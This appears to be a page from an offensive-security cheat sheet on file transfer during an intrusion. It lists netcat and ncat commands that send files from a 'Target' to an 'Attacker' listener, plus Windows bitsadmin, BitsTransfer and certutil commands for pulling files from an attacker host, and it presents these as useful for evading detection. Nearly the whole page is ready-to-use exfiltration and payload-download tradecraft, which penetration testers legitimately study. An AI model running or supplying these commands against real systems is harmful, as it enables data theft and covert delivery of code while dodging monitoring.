Miscellaneous

The different applications/tools can also be used for file transfer (also useful for Evading Detection).

+file download +file upload

Netcat

File transfer from Target to Attacker

Attacker:

nc -l -p <PORT> > <NEW_NAME>

Target:

nc -q 0 <IP> <PORT> < <FILE>

File transfer from Target to Attacker

Attacker:

ncat -l -p <PORT> --recv-only > <NEW_NAME>

Target:

ncat --send-only <IP> <PORT> < <FILE>

Downloading files on Windows.

bitsadmin /transfer wcb /priority foreground http://<IP>:<PORT>/<FILE> <NEW_NAME>

Allows downloading and uploading files on Windows.

Import-Module bitstransfer; Start-BitsTransfer -Source "http://<IP>:<PORT>/<FILE>" -Destination "<NEW_NAME>"

For the upload try to reverse the source and destination arguments, setting a Server Python3 with Upload Option (and self-signed certificate).

Downloading files on Windows.

certutil.exe -verifyctl -split -f http://<IP>:<PORT>/<FILE>

Last updated 1 year ago

Was this helpful?